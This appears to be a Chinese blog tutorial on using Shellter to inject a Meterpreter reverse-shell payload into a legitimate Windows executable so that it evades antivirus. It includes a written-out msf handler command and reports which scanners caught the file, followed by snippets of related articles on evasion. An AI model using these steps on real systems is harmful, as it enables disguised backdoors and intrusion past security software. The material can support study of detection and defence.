shellter使用及免杀测试

最新推荐文章于 2024-11-18 16:47:44 发布
原创 最新推荐文章于 2024-11-18 16:47:44 发布 · 4.2k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

Shellter是一款用于免杀的开源工具,通过动态Shellcode注入实现效果。本文介绍了如何在Kali Linux和Windows中安装Shellter,以及详细的操作步骤,包括选择自动模式、注入PE文件、启用隐身模式等。在靶机上执行生成的文件,能够绕过静态查杀,但在动态查杀下被火绒检测到。

shellter是一个开源的老牌免杀工具,最初版在2014年发布,现在已经到Shellter Pro v4.0了。它利⽤动态Shellcode注⼊或者命令来实现免杀的效果。

shellter安装

shellter在kali中是自带的,再接在命令行shellter就可以。

如果想在windows中安装的话就去官方下载源码包:

下载后解压,直接在命令行就可以用,不需要安装。

shellter使用

以下所有的演示都是在kali自带的shellter中进行。

进入shellter后首先看到

 选择操作方式:自动/手动,我们选择自动:A

这里需要指定一个正常的PE文件作为被注入程序,之后程序会把 文件 进⾏备份,因为⽣成的payload会⾃动覆盖原来的文件 。

 等待生成结束

这里询问是否启动隐身模式,可以根据情况,但是启用隐身模式后免杀能力会变弱,所以不建议启用。

这里我们先启用看看

询问是否使用列出的这些负载,选择L,然后选用第一个,输入ip和port

生成完成后就是你指定的那个文件,把他拷贝到靶机中。

进入msf:handler -H 192.168.37.128 -P 9999 -p windows/meterpreter/reverse_tcp 监听9999端口

然后在靶机中执行文件。

成功上线。

打开火绒和360试试

可上线。静态都没有反应,火绒动态查杀到了。

以上内容仅供学习。

shellter
afei001
03-28 898
Shellter简介 Shellter是一个动态的shellcode注入工具,是第一个真正动态的PE infector创建的。“动态”二字就能够说明注入代码不可能存在于规则严格的地方,例如可执行文件的入口点等。它可以用于将shellcode注入本机Windows应用程序(目前仅适用于32位应用程序)。 目前,Shellter已经被正式收录到Kali Li...
关于永恒之蓝漏洞和生成后门木马以及加壳的学习过程以及一些经验的分享
m0_74805513的博客
07-20 1613
首先这个文章是重点针对于加壳的一个文章如果你是想在这个地方重点学习永恒之蓝或者利用msfvenom来生成后门木马,可以私信我给你们发word版的笔记,由于我也是一个新手,如果有不对的地方,希望有大佬可以指出。 那么下面进入正题第一步加壳工具的安装和使用方法: 第一步确定你所需要的版本,这里的加壳工具shellter有两个版本第一个版本是kali版安装步骤如下: apt-get update //更新 apt-get install shellter //在线安装 在kali上使用
kali工具shellter
scholar_1的博客
08-06 4937
工具安装完成后再/usr/share/windows-resources/shellter 这个文件夹shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。Choose Operation Mode - Auto/Manual (A/M/H):A //A:自动模式自动注入后门,M:高级模式,H:帮助。(Y/N/H): Y //是否启用隐身模式 Y:启用 N:不启用 H:帮助。...
一款用于PE文件绑定的工具: Shellter
xf555er的博客
01-26 2033
Shellter是一种动态二进制程序壳程序,它可以在现有的可执行文件中隐藏恶意软件。它使用动态链接库技术来实现恶意代码的注入,并且可以在不修改现有的可执行文件的情况下进行注入。这使得它非常难以检测,因为它不会改变文件的哈希值或数字签名Shellter的官方下载地址:https://www.shellterproject.com/当前Shellter最新费版本是v7.2,最新收费版本是v_pro4.7。
kali linux捆绑工具shellter的安装及使用
热门推荐
wkend的博客
03-16 1万+
kali linux捆绑工具shellter的安装及使用 按图所示输入命令 2.输入shellter,出现下图所示表示安装成功 shellter使用 1.从浏览器下载putty,并且剪切到home目录下 2.在这里提示有三种操作模式 - A:自动 - M:管理者,高级模式 - H:帮助选项 在这里我们输入A,选择自动模式 3.输入pe t...
远控专题7 ---shellter
qq_41683305的博客
03-11 996
0x01 能力一览表 几点说明: 1、上表中标识 √ 说明相应毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒毒情况指的是静态+动态查。360毒版本5.0.0.8160(201...
测试】Kali之Metasploit几款工具练习
朔方飞絮谈安全
01-11 1万+
余磊  不知攻,焉知防。作为渗透测试攻城狮,实战之前要做大量的攻防练习。一般黑客拿到主机的shell之后,需要留后门方便进行下一步的渗透。普通的木马已经很容易被查工具识别,这时就催生出了技术来绕过毒软件。 下面就尝试测试有关工具的效果,三款工具为,shellter,Veil,  Avet 01 shellter Shellter采用了动
关于如何使用shellter以及shielden对于正常软件的双重加壳,过火绒和360
07-16
1. **Shellter工具**:Shellter是一个能够将木马嵌入到正常软件中的工具,通过这种方式,可以有效地避开毒软件的检测,实现加壳。它支持将恶意代码注入到32位的可执行文件中,以隐藏木马的行为。 2. **Kali ...
病毒工具shellter
最新发布
03-08
### 执行过程 当一切准备就绪后,选择待保护的目标 PE 文件作为载体导入项目空间内。接着指定要植入的有效载荷类型及其参数选项——这通常涉及挑选合适的编码器减少特征匹配概率,以及调整输出属性确保混淆效果...
TideSec远控学习三(Venom+Shellter
fa1lr4in的小博客
02-11 1596
参考链接: 利用meterpreter下的Venom后门:https://www.cnblogs.com/wh4am1/p/7469625.html 后门venom :https://www.ggsec.cn/venom.html msf及后渗透技术:https://bbs.ichunqiu.com/thread-49618-1-1.html Venom Venom和Veil...
Shellter实操——exe文件注入
渗透测试
08-03 2365
Shellter实操 shellter主要功能为入侵PE文件(exe),可以将shell代码注入任何32位的本地windows应用程序当中,它允许搭配metasploit框架使用 安装shellter apt-get install shellter 安装完成后,提示符输入shellter打开 成功打开后会出现一个 这里提示可以选择自动(A)手动(M)以及帮助(H),我们选择A 这一步是提供pe目标文件,下面是我自己导入的一个exe文件 大概过个一分钟(或更短)就会提示成功 接下来提示是否选择隐
shellter技术实战
大方子
09-06 1582
Shellter是一个开源的工具,利用动态Shellcode注入来实现的效果,想了解更多可以参考shellter官网:https://www.shellterproject.com/     文件下载地址:https://www.shellterproject.com/download/   实验环境:kali  shellter_v6.9  360  putty.exe   ...
shellter-kali工具
dongxieaitonglao的博客
03-17 413
/usr/share/windows-resources/shellter 这个文件夹 shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下
远控专题(7)-Shellter(VT率7/69)
Ms08067安全实验室
03-04 763
本专题文章导航1、远控专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2、远控专题(2)-msfvenom隐...
揭秘最为知名的黑客工具之一:Shellter(Shellcode注入利器)
白帽阿叁的博客
11-18 1577
Shellter 是一款动态Shellcode注入工具,最初由GrayNess开发,旨在帮助安全研究人员生成能够绕过防病毒软件检测的恶意载荷。通过将Shellcode注入合法的可执行文件,Shellter不仅可以生成功能强大的载荷,还能够保持载荷的隐蔽性,降低被检测和拦截的风险。
马学习(MSF Shellter)
红队是青春
02-05 429
马学习 MSF Shellter
Shellter - 执行文件注入后门工具使用
南迪叶先森
07-09 1140
Shellter介绍 Shellter 是将代码注入到正常的PE文件当中,将有效载荷重新编码(此处为 shellcode)以绕过防病毒 (AV) 软件,而且必须是32位的程序,应用程序的 PE(可移植可执行文件)文件格式的动态感染器。 下载及安装 Shellter可运行 Linux 、Mac 、Windows 环境,在 Windows 下运行,需要安装 Linux子系统,可通过官方提供地址进行下载:https://www.shellterproject.com/download/,搭建是在Kali环境下进行
kali制作木马并使用shellter工具来实现更低的查
勤能补拙
05-29 1887
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避毒软件的查。俗称为
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值